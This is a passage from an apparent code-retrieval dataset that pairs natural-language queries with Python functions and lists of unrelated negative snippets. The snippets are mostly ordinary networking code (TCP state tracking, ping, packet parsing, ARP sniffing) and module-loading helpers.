self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def test_ignore_non_arp_packets(self):\n packet = IP(dst='www.apple.com') / TCP(dport=80) / Raw(b'test')\n\n chef = ARPChef()\n dumpling = chef.packet_handler(packet)\n\n assert chef.ip_mac == {}\n assert dumpling is None", "def before_resend(self, packet):\n pass", "def eos_ping(eos, ipaddr, count=2, timeout=3, interface=None, size=None, ttl=None, verbose=False):\n\n cmd = \"sudo ping -c{c} {ip} -W {to}\".format(c=count, ip=ipaddr, to=timeout)\n if interface is not None:\n cmd += \" -I {}\".format(interface)\n if size is not None:\n cmd += \" -s {}\".format(size)\n if ttl is not None:\n cmd += \" -t {}\".format(ttl)\n\n output = eos.command(cmd, module_ignore_errors=True)\n if verbose:\n logger.info(\"Ping : %s\" % cmd)\n logger.info(\"Result: %s\", output['stdout_lines'][-2:])\n\n output['parsed'] = parse_ping(output['stdout_lines'])\n\n if \"Network is unreachable\" in output['stderr']:\n raise AssertionError('Network is unreachable')\n\n if \"error code\" in output['stdout_lines'][-1]:\n raise AssertionError(output['parsed'])\n\n if \"0% packet loss\" not in output['stdout_lines'][-2]:\n logger.warning(\"Did not find 0 percent packet loss: %s\" % output['stdout_lines'][-2:])\n raise AssertionError(\"Ping failed: %s\" % output['parsed'])\n\n return output", "def output_generator(pkt):\r\n ethe_header = pkt[0]\r\n ip_header = pkt[1]\r\n protocol = pkt[1][7]\r\n data_header = pkt[2]\r\n ethe_prefix = \"ETHER: \"\r\n ip_prefix = \"IP: \"\r\n tcp_prefix = \"TCP: \"\r\n udp_prefix = \"UDP: \"\r\n icmp_prefix = \"ICMP: \"\r\n # print ether header information\r\n print(\"\\n\" + ethe_prefix + \"----- Ether Header -----\")\r\n print(ethe_prefix)\r\n print(ethe_prefix + \"Packet size = \" + str(ethe_header[0]) + \" bytes\")\r\n print(ethe_prefix + \"Destination = \" + str(ethe_header[1]))\r\n print(ethe_prefix + \"Source = \" + str(ethe_header[2]))\r\n print(ethe_prefix + \"Ethertype = \" + str(ethe_header[3]) + \" (IP)\")\r\n print(ethe_prefix)\r\n\r\n print(ip_prefix + \"----- IP Header -----\")\r\n print(ip_prefix)\r\n print(ip_prefix + \"Version = \" + str(ip_header[0]))\r\n print(ip_prefix + \"Header length = \" + str(4 * int(ip_header[1])) + \" bytes\")\r\n print(ip_prefix + \"Type of service = 0x\" + str(ip_header[2]))\r\n if str(ip_header[2]) == \"00\":\r\n print(ip_prefix + \"\\txxx. .... = 0 (precedence)\")\r\n print(ip_prefix + \"\\t...0 .... = normal delay\")\r\n print(ip_prefix + \"\\t.... 0... = normal throughput\")\r\n print(ip_prefix + \"\\t.... .0.. = normal reliability\")\r\n print(ip_prefix + \"Total length = \" + str(ip_header[3]) + \" bytes\")\r\n print(ip_prefix + \"Identification = \" + str(ip_header[4]))\r\n print(ip_prefix + \"Flags = 0x\" + str(ip_header[5]))\r\n flag = str(format(int(ip_header[5][0]), '04b'))\r\n if flag[0] == \"0\":\r\n print(ip_prefix + \"\\t0... ... = Reserved bit: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t1... ... = Reserved bit: set\")\r\n if flag[1] == \"0\":\r\n print(ip_prefix + \"\\t.0.. ... = Don't fragment: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t.1.. ... = Don't fragment: set\")\r\n if flag[2] == \"0\":\r\n print(ip_prefix + \"\\t..0. ... = More fragments: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t..1. ... = More fragments: set\")\r\n flag_offset = str((int(ip_header[5][2:3])))\r\n print(ip_prefix + \"Fragment offset = \" + flag_offset + \" bytes\")\r\n print(ip_prefix + \"Time to live = \" + str(ip_header[6]) + \" seconds/hops\")\r\n if protocol == 1:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (ICMP)\")\r\n if protocol == 17:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (UDP)\")\r\n if protocol == 6:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (TCP)\")\r\n print(ip_prefix + \"Header checksum = \" + str(ip_header[8]))\r\n print(ip_prefix + \"Source address = \" + str(ip_header[9]))\r\n print(ip_prefix + \"Destination address = \" + str(ip_header[10]))\r\n if ip_header[11] == \"\":\r\n print(ip_prefix + \"No options\")\r\n else:\r\n print(ip_prefix + \"Options: \" + ip_header[11])\r\n print(ip_prefix)\r\n\r\n if protocol == 1:\r\n print(icmp_prefix + \"----- ICMP Header -----\")\r\n print(icmp_prefix)\r\n if str(data_header[0]) == \"8\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo request)\")\r\n elif str(data_header[0]) == \"0\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo reply)\")\r\n else:\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]))\r\n print(icmp_prefix + \"Code = \" + str(data_header[1]))\r\n print(icmp_prefix + \"Checksum = \" + str(data_header[2]))\r\n print(icmp_prefix)\r\n\r\n elif protocol == 6:\r\n print(tcp_prefix + \"----- TCP Header -----\")\r\n print(tcp_prefix)\r\n print(tcp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(tcp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(tcp_prefix + \"Sequence number = \" + str(data_header[2]))\r\n print(tcp_prefix + \"Acknowledgement number = \" + str(data_header[3]))\r\n print(tcp_prefix + \"Data offset = \" + str(data_header[4]) + \" bytes\")\r\n flag = str(data_header[5])\r\n print(tcp_prefix + \"\\tReserved: Not set\")\r\n print(tcp_prefix + \"\\tNonce: Not set\")\r\n if flag[0] == \"0\":\r\n print(tcp_prefix + \"\\tCWR: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tCWR: Set\")\r\n if flag[1] == \"0\":\r\n print(tcp_prefix + \"\\tECN-Echo : No set\")\r\n else:\r\n print(tcp_prefix + \"\\tECN-Echo: Set\")\r\n if flag[2] == \"0\":\r\n print(tcp_prefix + \"\\tUrgent: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tUrgent: Set\")\r\n if flag[3] == \"0\":\r\n print(tcp_prefix + \"\\tAcknowledgment: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tAcknowledgment: Set\")\r\n if flag[4] == \"0\":\r\n print(tcp_prefix + \"\\tPush: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tPush: Set\")\r\n if flag[5] == \"0\":\r\n print(tcp_prefix + \"\\tReset: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tReset: Set\")\r\n if flag[6] == \"0\":\r\n print(tcp_prefix + \"\\tSyn: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tSyn: Set\")\r\n if flag[7] == \"0\":\r\n print(tcp_prefix + \"\\tFin: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tFin: Set\")\r\n print(tcp_prefix + \"Window = \" + str(data_header[6]))\r\n print(tcp_prefix + \"Checksum 0x= \" + str(data_header[7]))\r\n print(tcp_prefix + \"Urgent pointers = \" + str(data_header[8]))\r\n if data_header[9] != 0:\r\n print(tcp_prefix + \"Options\")\r\n else:\r\n print(tcp_prefix + \"No options\")\r\n print(tcp_prefix)\r\n\r\n elif protocol == 17:\r\n print(udp_prefix + \"----- UDP Header -----\")\r\n print(udp_prefix)\r\n print(udp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(udp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(udp_prefix + \"Length = \" + str(data_header[2]))\r\n print(udp_prefix + \"Checksum = \" + str(data_header[3]))\r\n print(udp_prefix)", "def ack_or_timeout(receiver):\n\n timeout_starts = time.time() \n while not receiver.available(pipes[0]) and (time.time() - timeout_starts) < 1:\n time.sleep(0.01)", "def compute_mptcp_dss_retransmissions(pcap_filepath, mptcp_connections, fast_conns, ts_syn_timeout=6.0, ts_timeout=3600.0):\n print(\"Computing MPTCP DSS retransmissions for\", pcap_filepath)\n acks = {}\n conn_acks = {}\n # Avoid processing packets that do not belong to any analyzed TCP connection\n black_list = set()\n pcap_file = open(pcap_filepath)\n pcap = dpkt.pcap.Reader(pcap_file)\n count = 0\n for ts, buf in pcap:\n ts_delta = get_ts_delta(ts)\n count += 1\n if count % 100000 == 0:\n print(count)\n eth = dpkt.ethernet.Ethernet(buf)\n if type(eth.data) == dpkt.ip.IP or type(eth.data) == dpkt.ip6.IP6:\n ip = eth.data\n if type(ip.data) == dpkt.tcp.TCP:\n tcp = ip.data\n fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0\n syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0\n rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0\n ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0\n\n saddr, daddr, sport, dport = get_ips_and_ports(eth, ip, tcp)\n\n if syn_flag and not ack_flag and not fin_flag and not rst_flag:\n process_mptcp_first_syn(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns,\n ts_syn_timeout, ts_timeout)\n\n elif (saddr, sport, daddr, dport) in black_list:\n continue\n\n elif syn_flag and ack_flag and not fin_flag and not rst_flag:\n process_mptcp_syn_ack(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns,\n ts_syn_timeout, ts_timeout)\n\n elif not syn_flag and not rst_flag and ack_flag:\n if (saddr, sport, daddr, dport) in acks:\n process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport)\n\n elif (daddr, dport, saddr, sport) in acks:\n process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport)\n else:\n # Silently ignore those packets\n # print(saddr, sport, daddr, dport, \"haven't seen beginning...\")\n continue\n\n pcap_file.close()", "def receive_ping(my_socket, ID, timeout):\n start_time = timeout\n while True:\n start_select = time.clock()\n # select.select(rlist, wlist, xlist[, timeout])\n # wait until ready for read / write / exceptional condition\n # The return value is a triple of lists\n what_ready = select.select([my_socket], [], [], start_time)\n how_long = (time.clock() - start_select)\n if what_ready[0] == []: #timeout\n return\n\n time_received = time.clock()\n # socket.recvfrom(bufsize[, flags])\n # The return value is a pair (string, address)\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20 : 28]\n ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n if ip_type != 8 and packet_ID == ID: # ip_type should be 0\n byte_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + byte_in_double])[0]\n return time_received - time_sent\n\n start_time = start_time - how_long\n if start_time <= 0:\n return", "def onPing(self, payload):\n super().onPing(payload)\n self.log.debug(\"Pinged: {}\".format(payload))\n self.log.debug(self.last_ping)\n self.log.debug(time.time() - self.last_ping)\n # If groupme's \"ping\" takes longer than 32 seconds, reset connection\n if not (not (time.time() - self.last_ping > 32) and not (time.time() - self.start_time > self.timeout)):\n self.sendClose()", "def handle_ping(self, message_header, message):\n\t\tpong = Pong()\n\t\tpong.nonce = message.nonce\n\t\tself.send_message(pong)", "def ping(self, ip):\n res = self.cli('ping ' + ip)\n # '8 bytes from fdde:ad00:beef:0:0:ff:fe00:e000: icmp_seq=2 hlim=64 time=236ms\\r\\n'\n # 'Error 6: Parse\\r\\n'\n # no answer\n ret_time = -1\n try:\n ret_time = int(res.split('time=')[1].split('ms')[0])\n except Exception:\n pass\n return ret_time", "def tests():\n\n global ToartalCount1, ToartalCount2\n s = initTcpConn()\n sock, mreq = initUDPconn()\n s.listen(1)\n while True:\n timer = time.time() + 10\n while time.time() < timer:\n sock.sendto(mreq, (LocalIP, 13117))\n time.sleep(1)\n s.settimeout(0)\n try:\n conn, add = s.accept()\n except:\n print(\"accepting connection faild\")\n conn.setblocking(1)\n data=conn.recv(BufferSize)\n print(\"hii \" + data.decode() + \" welcome to the game\")\n try:\n conn.sendall(\"Please Enter what ever you want you have 10 sec\".encode())\n except:\n print(\"sending starting mss faild\")\n timer = time.time() + 10\n while time.time() < timer:\n ch = conn.recv(1)\n count = count + 1\n print(count)", "def SendTimeout(self) -> int:", "def SendTimeout(self) -> int:", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def ping(worker,count=4):\n ip=worker[1]\n \n ping = subprocess.Popen(\n [\"ping\", \"-c\", str(count), str(ip)],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n )\n \n out, error = ping.communicate()\n \n #if anything is wrong stdout will be blank, therefore failure\n if len(out)==0:\n return False\n \n #search for packet loss and return the percentage\n return int(re.search(\"(\\d*)\\% packet loss\",out).group(1))!=100", "def run_forever(self):\n scapy.sniff(prn=self.arp_cb, filter=\"arp\", store=0, count=0)", "def test_udp_query():\n assert dnsck_query(\"8.8.8.8\", \"google.com\", \"a\", 1) == 0", "def slot_keepalive_timer(self, _sender, _data):\r\n if self.connected:\r\n #self.debug(\"### sending keepalive\")\r\n self._try_send_raw(\"2::\")" ]
[ "0.64529324", "0.63816625", "0.6354133", "0.6196364", "0.61904454", "0.61332846", "0.6091843", "0.59220237", "0.5845445", "0.5802433", "0.5794148", "0.5763908", "0.57570946", "0.56948966", "0.56458026", "0.56425583", "0.563012", "0.56200063", "0.561671", "0.5613484", "0.5589428", "0.55827665", "0.55750597", "0.5555836", "0.55508804", "0.5536911", "0.5521988", "0.55014", "0.54927635", "0.54850596", "0.5461681", "0.54594654", "0.54487836", "0.5418109", "0.54085284", "0.54083455", "0.5390171", "0.53830004", "0.5365767", "0.53555095", "0.53549546", "0.53443795", "0.5293345", "0.5290358", "0.5280681", "0.5274256", "0.5265169", "0.5262563", "0.52453095", "0.52375156", "0.5232418", "0.5227771", "0.5213386", "0.52125794", "0.5182193", "0.51776826", "0.516955", "0.5168911", "0.51529425", "0.5131909", "0.5129721", "0.51160014", "0.5115128", "0.51075464", "0.50973916", "0.50933635", "0.50909185", "0.5083908", "0.508269", "0.50778013", "0.507705", "0.50760144", "0.5074156", "0.5070112", "0.5070112", "0.5070112", "0.5070112", "0.50698817", "0.5069673", "0.5069071", "0.506894", "0.50687796", "0.5063047", "0.50609046", "0.5054419", "0.5053589", "0.505043", "0.5038501", "0.5025972", "0.5024627", "0.50214475", "0.50214285", "0.5018618", "0.50156224", "0.5006085", "0.5006085", "0.5001214", "0.5000496", "0.4996893", "0.49946266", "0.49928787" ]
0.0
-1
load Load all modules.
def load(self): self.commands = { # Usual text commands (e.g. "/echo 123") 'user': {}, 'owner': { 'load': self.load, 'modprobe': self.modprobe, 'rmmod': self.rmmod }, # Modules for bot's reaction to a different message types 'text': {}, 'photo': {}, 'audio': {}, 'video': {}, 'sticker': {}, 'voice': {} } for file in os.listdir('modules'): if file.endswith('.py'): command_type, command = file.split('_', 1) self.modprobe(self, command[:-3])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadModule(*args, allModules: bool=True, load: AnyStr=\"\", scan: bool=True,\n **kwargs)->List[AnyStr]:\n pass", "def _load_modules(self):\n modules_src = os.path.abspath(\"src/modules\")\n\n # perform a tree walk over modules directory\n for file_name, file_path in self._tree_walk(modules_src):\n try:\n # try to find a spec for this file and construct a module\n # from it\n spec = spec_from_file_location(file_name, file_path)\n assert spec is not None\n module = module_from_spec(spec)\n assert spec.loader is not None\n spec.loader.exec_module(module)\n self.modules.append(module)\n self._loaded_modules_names.append(module.__name__)\n except:\n pass", "def load_shutit_modules(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tif self.loglevel <= logging.DEBUG:\n\t\t\tself.log('ShutIt module paths now: ',level=logging.DEBUG)\n\t\t\tself.log(self.host['shutit_module_path'],level=logging.DEBUG)\n\t\tfor shutit_module_path in self.host['shutit_module_path']:\n\t\t\tself.load_all_from_path(shutit_module_path)", "def _import_all(self):\n # on first load, documents dir may not be in import path\n if not self.app.documents_dir in sys.path:\n sys.path += [self.app.documents_dir]\n # clean modules dict before (re)loading anything\n self._remove_non_current_game_modules()\n # make copy of old modules table for import vs reload check\n old_modules = self.modules.copy()\n self.modules = {}\n # load/reload new modules\n for module_name in self._get_game_modules_list():\n try:\n # always reload built in modules\n if module_name in self.builtin_module_names or \\\n module_name in old_modules:\n m = importlib.reload(old_modules[module_name])\n else:\n m = importlib.import_module(module_name)\n self.modules[module_name] = m\n except Exception as e:\n self.app.log_import_exception(e, module_name)", "def load_modules(self):\n module_dir = os.path.dirname(__file__)\n names = [os.path.splitext(i) for i in os.listdir(module_dir)\n if os.path.isfile(os.path.join(module_dir, i))]\n # FIXME: sort 'plain' to start of list for devel.\n names.sort(key=lambda x: (not x[0].startswith('plain'), x[0]))\n modules = []\n for name in [i[0] for i in names if i[1].lower() == '.py']:\n try:\n modules.append(import_module('leo.plugins.editpane.' + name))\n DBG(f\"Loaded module: {name}\")\n except ImportError as e:\n DBG(\n f\"{e.__class__.__name__}: \"\n f\"Module not loaded (unmet dependencies?): {name}\")\n for module in modules:\n for key in dir(module):\n value = getattr(module, key)\n if hasattr(value, 'lep_type') and value not in self.widget_classes:\n if module not in self.modules:\n self.modules.append(module)\n self.widget_classes.append(value)\n self.widget_for[value.lep_type].append(value)", "def handle_loadall(bot, ievent):\n plugs.loadall(plugin_packages, force=True)\n ievent.done()", "def load_modules_manually():\n #cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))\n cmd_folder = '../myutils/'\n if cmd_folder not in sys.path:\n sys.path.insert(0, cmd_folder)\n #print sys.path", "def load_modules(bot, config):\n for item in MODULES:\n importlib.import_module(\"cogs.\" + item).setup(bot, config)", "def loadall(bot) :\n for feature in features :\n load(bot, feature)", "def _load_modules(self):\n modules = []\n agent_cls_list = dashboard_utils.get_all_modules(\n dashboard_utils.DashboardAgentModule\n )\n for cls in agent_cls_list:\n logger.info(\n \"Loading %s: %s\", dashboard_utils.DashboardAgentModule.__name__, cls\n )\n c = cls(self)\n modules.append(c)\n logger.info(\"Loaded %d modules.\", len(modules))\n return modules", "def _load_module_recursive(self, dir) :\t\n\t\tfor filepath in os.listdir(dir) :\n\t\t\tfullpath = os.path.join(dir, filepath)\n\n\t\t\tif os.path.isdir(fullpath) :\n\t\t\t\tself._load_module_recursive(fullpath)\n\n\t\t\telif os.path.splitext(filepath)[1] == '.py' :\n\t\t\t\tutils.load_module(fullpath, self.settings.ROOT_PATH)", "def add_to_loaded_modules(self, modules):\n modules = util.return_set(modules)\n for module in modules:\n if not isinstance(module, str):\n module = module.__name__\n self.loaded_modules.add(module)", "def load_all_submodules():\n # Load all modules in the current directory.\n pattern_list = _load_all_modules(__file__, __name__)\n return pattern_list", "def _load_all_modules(path, names):\n module_names = []\n # For each module in the current directory...\n for importer, module_name, is_package in pkgutil.iter_modules(\n [os.path.dirname(path)]\n ):\n # print(\"importing:\", names + '.' + module_name)\n # Import the module.\n importlib.import_module(names + '.' + module_name)\n module_names.append(module_name)\n\n return module_names", "def _load_defined_tasks():\n task_path = Path(__file__).parent.resolve() / \"nalu_tasks\"\n py_files = glob.glob(str(task_path / \"[a-z]*.py\"))\n modset = {Path(ff).stem for ff in py_files}\n for pymod in modset:\n importlib.import_module(\".%s\"%pymod, 'exawind.nalu.nalu_tasks')", "def _load_modules(self):\n moduledocs = self._docset.get_compounds(xml.Group,\n lambda x: x.get_name().startswith('module_'))\n for moduledoc in moduledocs:\n moduleobj = self._modules.get(moduledoc.get_name())\n if not moduleobj:\n self._reporter.input_error(\n \"no matching directory for module: {0}\".format(moduledoc))\n continue\n moduleobj.set_doc_xml(moduledoc, self)\n self._docmap[moduledoc] = moduleobj", "def load(self, *modules):\n for module in modules:\n if isinstance(module, six.string_types):\n try:\n module = get_object(module)\n except Exception as e:\n self.errors[module] = e\n continue\n self.modules[module.__package__] = module\n for (loader, module_name, is_pkg) in pkgutil.walk_packages(\n module.__path__):\n full_name = '{}.{}'.format(_package(module), module_name)\n try:\n self.modules[full_name] = get_object(full_name)\n if is_pkg:\n self.load(self.modules[full_name])\n except Exception as e:\n self.errors[full_name] = e", "def modules():", "def clear_loaded_modules(self):\n self._loaded_modules = []", "def loadAll(app, store, test=False):\n if test:\n loadTest(app, store)\n\n loadEnds(app, store)\n loadCors(app)\n loadErrors(app)", "def _load_all(self):\n if self._loaded_all is True:\n return\n for iface in self._scan:\n for bname in self._scan[iface]:\n if self._scan[iface][bname].get(\"loaded\"):\n continue\n self._load_item(iface, bname)\n self._loaded_all = True", "def load_handlers(self):\n\t\tself.handlers = []\n\t\tfor mod in os.listdir('classes/handlers'):\n\t\t\tif mod == '__init__.py' or mod[-3:] != '.py':\n\t\t\t\tcontinue\n\t\t\tlib = __import__(mod[:-3], locals(), globals())\n\t\t\tself.handlers.append(lib)\n\t\t#\n\t\tself.handlers.sort(key=lambda x: x.order, reverse=False)\n\t\tprint(\"Loaded handlers: \", ', '.join([x.tag for x in self.handlers]) )\n\t\tassert len(self.handlers)>0", "def modules_load(machine_config):\n\t#---modules in LOCAL configuration must be loaded before checking version\n\timport importlib\n\tif 'module_path' in machine_config: module_path = machine_config['module_path']\n\telse:\n\t\tmodule_parent = os.environ.get('MODULESHOME','/usr/share/Modules/default')\n\t\tmodule_path = os.path.join(module_parent,'init','python.py')\n\tincoming = {}\n\tif sys.version_info<(3,0): execfile(module_path,incoming)\n\telse: exec(open(module_path).read(),incoming)\n\t#---note that modules that rely on dynamically-linked C-code must use EnvironmentModules\n\tmodlist = machine_config['modules']\n\tif type(modlist)==str: modlist = modlist.split(',')\n\tfor mod in modlist:\n\t\t#---always unload gromacs to ensure correct version\n\t\tincoming['module']('unload','gromacs')\n\t\tprint('[STATUS] module load %s'%mod)\n\t\tincoming['module']('load',mod)", "def on_modules_loaded(self, loader, callback=None):\n enabled_list = self.get_enabled_modules()\n \n self.update_modules_priority(enabled_list)\n \n self._keybinder.connect(\"activated\", lambda k,t: self._emit_keybinding_activated(t))\n self._emit_loaded()\n \n for mod in enabled_list:\n modinst = self._module_list.get_module_instance_from_name( mod )\n if modinst != None:\n self._module_loader.initialize_module_async( modinst )\n self._loaded_modules += 1", "def load(self) -> t.Iterable[docspec.Module]:\n # Load all haystack modules\n temp_loader = PythonLoader(search_path=[\"../../../haystack\"])\n temp_loader.init(Context(directory=\".\"))\n all_modules = list(temp_loader.load())\n\n # Collect all classes\n classes = {}\n for 